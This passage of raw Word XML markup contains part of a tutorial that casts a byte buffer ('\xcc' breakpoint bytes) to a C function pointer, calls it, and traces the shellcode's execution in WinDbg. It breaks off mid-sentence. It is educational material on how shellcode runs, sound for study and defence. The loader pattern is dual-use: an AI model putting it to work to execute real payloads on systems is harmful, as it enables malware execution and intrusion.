          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// One way to do it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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(*)())</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>*)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)(*</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// Shortcut way to do it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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// (*(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">*)()) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>// sleep for a second</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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sleep</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>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ln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="lit"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>The way this code works is as follows: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A pointer to a function is declared, in the above code snippet that function pointer is named ‘</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The declared function pointer is than assigned the address of the code to execute (as any variable would be assigned with a value, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pointer is assigned with an address)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Finally the function pointer is called, meaning the execution flow is directed to the assigned address. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="006B5BC7">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t xml:space="preserve">Applying the same steps as above we can analyse this in memory with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>WinDbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:t>, which takes us to the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:t>The key steps that lead to code execution in this case are the following: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, contained in a local variable, is pushed onto the stack during initialization (relatively close the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, as this is one of the first things to happen in the main-method)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is loaded from the stack into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>eax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> as shown at address 0x00fd1753</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00254458" w:rsidRPr="00F07469" w:rsidRDefault="00254458" w:rsidP="00254458">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F07469">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is executed by calling </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F07469">
